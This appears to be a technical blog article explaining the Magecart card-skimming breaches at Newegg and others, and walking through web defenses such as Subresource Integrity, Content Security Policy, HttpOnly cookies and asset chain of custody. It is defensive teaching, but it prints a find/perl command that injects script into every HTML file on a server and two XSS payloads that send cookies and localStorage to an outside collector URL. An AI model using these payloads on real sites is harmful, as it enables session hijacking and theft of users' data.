With Black Friday a little over a month away, the thought of a security breach exposing customer details to hackers should strike fear into the heart of every online retailer. Ticketmaster, Newegg, British Airways, and others have been targeted recently in a string of attacks that harvested over a million customer records; see media coverage of the British Airways, Shopper Approved, and Newegg breaches.

This article will dive into what’s so novel about these heists, and provide steps on how to protect your web application from similar vulnerabilities. Please note that this article is fairly technical in nature, but hopefully there’s something in it for everyone.

Magecart payload

Unconventional (or, the New Normal)

One common hacking pattern is to attack a public-facing web server, find database credentials stored somewhere in the filesystem, connect to the database with those credentials, and export the juiciest data. It’s a quick job, and it can go undetected for months, if it is ever discovered at all.

These new attacks are neat in that they’re a two-step process:

Find a way to inject malicious JavaScript code into a web page in which a user enters sensitive data
Wait for users to send you all their sensitive information without realizing it

Instead of stealing all the data at once, it’s leaked out transaction by transaction as users log in, pay for items, or execute other sensitive operations. This is an instance of the confused deputy problem:

The original confused deputy

The user’s web browser is tricked into giving up sensitive data that it shouldn’t.

Let’s use Newegg as an example. When a user made a purchase from https://secure.newegg.com, they were also sending data to https://neweggstats.com/, an innocent-looking domain that was registered and operated by Magecart. Operating from August 16 to September 18, 2018, Magecart harvested an undisclosed number of credit card and personal details from Newegg customers.

They were able to do this because someone inserted 15 lines of malicious code at the end of a JavaScript file used by the website. Whether it was injected by an employee or by a hacker who breached the web server remains to be seen.

Isn’t this just Cross-Site Scripting (XSS)?

Yup. For a quick refresher, see this. All the usual defenses apply, so let’s go through a few:

Defense 1: Immutable web content

Many web servers are configured to allow write access to web content. At some level it’s unavoidable: How else can you deploy the website in the first place? But there is a tremendous difference in attack surface between granting write access to a privileged user that exists only for deployment, and allowing a web application to rewrite any or all of its own files.

Let me illustrate this with an example.

For those of you running Linux web servers, if you were to run the following command as the www server user:

find / -iname '*html*' -exec perl -i -p -e 's/<head>/<head><script>alert("oh boy")<\/script>/g;' {} \;

Would users of your website receive an annoying popup?

What that command does is search for all files with html in the filename, and inject a tiny script that displays a popup when the page is loaded. Replace the popup with a different script that captures form data and sends it to a data-collector and all you have to do is wait for the credit card numbers to roll in. Once you’ve had enough, run a reversal script that makes it look like you were never there at all.
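To get a feel for how exposed a server is, here is a minimal Node.js sketch that lists everything under a web root that the current user could modify. The function names are made up for illustration, and the web root path is whatever your server uses. Directories are included on purpose: a writable directory lets an attacker replace a file even when the file itself is read-only.

```javascript
const fs = require('fs');
const path = require('path');

// True if the permission bits allow writes by the group or by "other" users.
function isGroupOrWorldWritable(mode) {
  return (mode & 0o022) !== 0;
}

// True if the user running this process may write to `target`.
function canWrite(target) {
  try {
    fs.accessSync(target, fs.constants.W_OK);
    return true;
  } catch {
    return false;
  }
}

// Recursively collect files and directories under `root` that the current
// user could modify. Symbolic links are skipped to keep the sketch simple.
function findWritablePaths(root) {
  const writable = canWrite(root) ? [root] : [];
  for (const entry of fs.readdirSync(root, { withFileTypes: true })) {
    const fullPath = path.join(root, entry.name);
    if (entry.isDirectory()) {
      writable.push(...findWritablePaths(fullPath));
    } else if (entry.isFile() && canWrite(fullPath)) {
      writable.push(fullPath);
    }
  }
  return writable;
}
```

Run something like this as the same user your web application runs as. Ideally the list comes back empty, or contains only directories that are meant to hold uploads and are never served as code.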

“But I’d never run that nefarious script!” You wouldn’t, but someone who found a hole in your avatar upload PHP script will. All it takes is one unsanitized shell_exec or Runtime.exec() and all of a sudden you’re serving malware to unsuspecting users.
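The same class of bug exists in Node.js, so here is a small sketch of the usual fix: hand user input to a child process as a single argument instead of splicing it into a shell command line. The function name is hypothetical, and the child process is Node itself only to keep the example portable; a real upload handler would more likely call an image tool.

```javascript
const { execFileSync } = require('child_process');

// Pass `userInput` to a child process as one argument.
// execFileSync does not start a shell by default, so characters such as
// ";" or "$(...)" arrive in the child as literal text, not as commands.
function echoAsSingleArgument(userInput) {
  // With "node -e <script> <arg>", the first extra argument is process.argv[1].
  const script = 'process.stdout.write(process.argv[1])';
  return execFileSync(process.execPath, ['-e', script, userInput], {
    encoding: 'utf8',
  });
}
```

Calling echoAsSingleArgument('avatar.png; echo pwned') hands the whole string back unchanged. Had the same string been concatenated into a command passed to a shell, the part after the semicolon would have run as a second command.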

Defense 2: Subresource Integrity (SRI)

This one applies to external JavaScript files that are included in a web page. Subresource Integrity is a way of loading an external JavaScript resource while verifying that it hasn’t been manipulated. You calculate a cryptographic hash of the file when you first embed it; if the file’s content changes later, the hash won’t match and the browser refuses to run it. For example:

<script src="https://cdn.com/jquery.js" integrity="sha384-FFCAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" crossorigin="anonymous"></script>

If cdn.com is compromised and someone replaces jquery.js with a malicious payload, the sha384-FFCAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC hash won’t match, turning what would have been a Cross-Site Scripting attack into a mere Denial of Service.
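If you’re wondering where that integrity value comes from, it is the hash algorithm’s name, a dash, and the base64-encoded digest of the file. Here is a minimal Node.js sketch; the function names are made up for illustration, and the file content would normally be read from the copy of the library you have reviewed.

```javascript
const crypto = require('crypto');

// Build an SRI value: "<algorithm>-<base64 digest of the file content>".
function sriHash(content, algorithm = 'sha384') {
  const digest = crypto.createHash(algorithm).update(content).digest('base64');
  return `${algorithm}-${digest}`;
}

// Render a script tag for a cross-origin file. crossorigin="anonymous" is
// included because browsers need a CORS-enabled response to check the hash.
function scriptTag(src, content) {
  return `<script src="${src}" integrity="${sriHash(content)}" crossorigin="anonymous"></script>`;
}
```

Regenerating the hash is a deliberate step every time you upgrade the library, which is the point: the file can’t change underneath you without someone noticing.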

Defense 3: Content Security Policy (CSP)

Content Security Policy is the closest thing to a silver bullet for many kinds of injection attacks. It’s like a firewall for your web page, providing the ability to white-list specific domains for specific purposes. Its fine-grained control allows you to do things like:

White-list certain domains for JS or CSS resources, disallowing access to all others
Ban all CDNs, requiring JS and CSS to be delivered from the page’s origin
Allow JS from cdn.example.com and nowhere else
Disallow all inline <script> tags
Block mixed content, or upgrade insecure requests to HTTPS
Mandate Subresource Integrity on all JS scripts (via the experimental require-sri-for directive, which few browsers support)
Receive reports when the CSP is violated

This is all done through the Content-Security-Policy HTTP response header. Writing the policy can be a bit unwieldy at first, but the big benefit is that it can be specified upstream of your web server, at the load balancer or reverse proxy level.
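To make that concrete, here is a small sketch that assembles a policy string from a plain object. The helper name and the /csp-report endpoint are hypothetical, and the policy is only an illustration of the items listed above, not a recommendation for your site.

```javascript
// Turn { directive: [sources...] } into a Content-Security-Policy value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => [name, ...sources].join(' '))
    .join('; ');
}

const policy = buildCsp({
  // Anything not listed below may only come from the page's own origin.
  'default-src': ["'self'"],
  // Scripts may come from the origin and one CDN. Inline <script> tags are
  // blocked because 'unsafe-inline' is not listed.
  'script-src': ["'self'", 'https://cdn.example.com'],
  // Hypothetical endpoint that receives violation reports.
  'report-uri': ['/csp-report'],
});
```

The resulting string is what you would send as the value of the Content-Security-Policy header. While tuning a policy, the same value can be sent as Content-Security-Policy-Report-Only, which reports violations without blocking anything.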

The other good thing about CSP is that it explicitly codifies the list of third parties you trust to inject code into your web page in a user’s web browser. This will be an important part of any disaster recovery or risk mitigation strategy.

Defense 4: HttpOnly Cookies

At this point we are beyond defense, and onto damage mitigation. An attacker has found a way to inject malicious code into your website. How can we limit the damage they can do?

Cookies are a valuable target. If a user has selected “Keep me logged in” or something similar, cookie theft can allow user impersonation.

Here’s the oldest XSS payload in the book:

<script>document.location='https://walletinspector.com/cookiemonster.php?c='+document.cookie;</script>

If you can sneak that into a forum post or guest book comment and the site doesn’t properly sanitize input, every visitor who views that post will send you their delicious cookies. The standard defense is an HttpOnly cookie. These cookies are sent from the client to the server in the usual way, but they don’t show up in document.cookie, so JavaScript can’t see them.
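HttpOnly is just an attribute on the Set-Cookie response header. Here is a minimal sketch of building one by hand; the function name and cookie name are hypothetical, and most web frameworks expose the same attributes as options on their own cookie helpers.

```javascript
// Build a Set-Cookie header value for a session cookie.
function sessionCookie(name, value, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${maxAgeSeconds}`,
    'Path=/',
    'HttpOnly',     // hidden from document.cookie, so injected scripts can't read it
    'Secure',       // only sent over HTTPS
    'SameSite=Lax', // not sent on most cross-site subrequests
  ].join('; ');
}
```

For example, sessionCookie('session', 'abc123', 3600) produces a header value ending in "HttpOnly; Secure; SameSite=Lax". An injected script can still make requests that carry the cookie, but it can no longer copy the cookie off to another server.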

Lately, cookies have fallen out of fashion and localStorage has become much more popular. In this era of micro-services and shared-nothing architecture, the humble cookie gets short shrift. That’s a shame, because localStorage is vulnerable to the second-oldest XSS in the book:

<script>document.location='https://walletinspector.com/cookiemonster.php?c='+JSON.stringify(localStorage);</script>

And now we’re back where we started: One XSS and someone can grab the whole localStorage-jar. Using localStorage for anything you wouldn’t want on a billboard is a ticking time bomb.

Defense 5: Chain of Custody for assets

Chain of custody is a concept in law enforcement where every interaction with a piece of evidence is audited to prevent tampering or contamination. Why is this important? Let’s use the Newegg breach as an example.

Investigators discovered that a JavaScript asset Modernizr.js had been compromised, with 15 lines of malicious JavaScript tacked onto the end. How did it get there? Here is one speculative possibility:

1. Developer is assigned a bug where the site doesn’t display correctly on an older version of Internet Explorer
2. Internet research shows that a free third-party library called Modernizr fixes this and other compatibility issues with older browsers
3. Developer goes to https://modernizr.com/, clicks Download
4. Copies file into project
5. Tests locally, appears that it fixes the bug
6. Commits changes into version control system
7. Deploys changes to production
8. [1 month passes, possibly with more deploys]
9. User visits website, is served malicious version of Modernizr

The details of their deployment process may be different, but these are the broad strokes. What can we deduce?

There is likely an audit trail around the version control system.
Because of this, we should be able to tell if the file that was checked into VCS was compromised.
If the file in VCS is clean, it’s likely the file was modified somewhere between steps 8 and 9.
If the file in VCS is malicious, it’s likely the file was modified somewhere between steps 3 and 6.

That would help narrow things down, but you can likely see a few gaps. Imagine your boss coming up to you and demanding “I need you to be able to prove to me that the version of Modernizr we send our customers is the exact same as the version on Modernizr’s website”, then work backwards from there. That exercise will help fill in some of the blanks in your information security policy.
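One way to start answering that question is to record a hash of each third-party file when it is first reviewed, then compare what you actually serve against that record. Below is a minimal sketch of the idea. The manifest format and function names are assumptions made for illustration, not a description of any particular tool.

```javascript
const crypto = require('crypto');

// Hex-encoded SHA-256 digest of a file's content.
function sha256Hex(content) {
  return crypto.createHash('sha256').update(content).digest('hex');
}

// Record a digest for each reviewed asset, e.g. at the time it is committed.
// `assets` maps a file name to its content.
function recordManifest(assets) {
  const manifest = {};
  for (const [name, content] of Object.entries(assets)) {
    manifest[name] = sha256Hex(content);
  }
  return manifest;
}

// Return the names of assets that are missing or no longer match the manifest.
function findTamperedAssets(manifest, assets) {
  const mismatches = [];
  for (const [name, expected] of Object.entries(manifest)) {
    const content = assets[name];
    if (content === undefined || sha256Hex(content) !== expected) {
      mismatches.push(name);
    }
  }
  return mismatches;
}
```

If the manifest lives in version control and the check runs against the files on the production server, a mismatch tells you the change happened after the commit. That is exactly the distinction drawn in the deductions above.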

Conclusion

Safety regulations are written in blood, and risk management policies are written in bottom-line losses. The same bean-counters that got rid of the slip-and-slide at the company picnic after someone broke a leg are going to be asking, if they aren’t already, questions like “How likely is it that this sort of thing happens to us?” Hand-waving the question away with “we follow best practices” will only get you so far.

This article only scratches the surface of web application security, but I hope it gives you some ideas on how to make your systems even more secure.

Any comments or ideas for future articles are appreciated. Thanks for reading.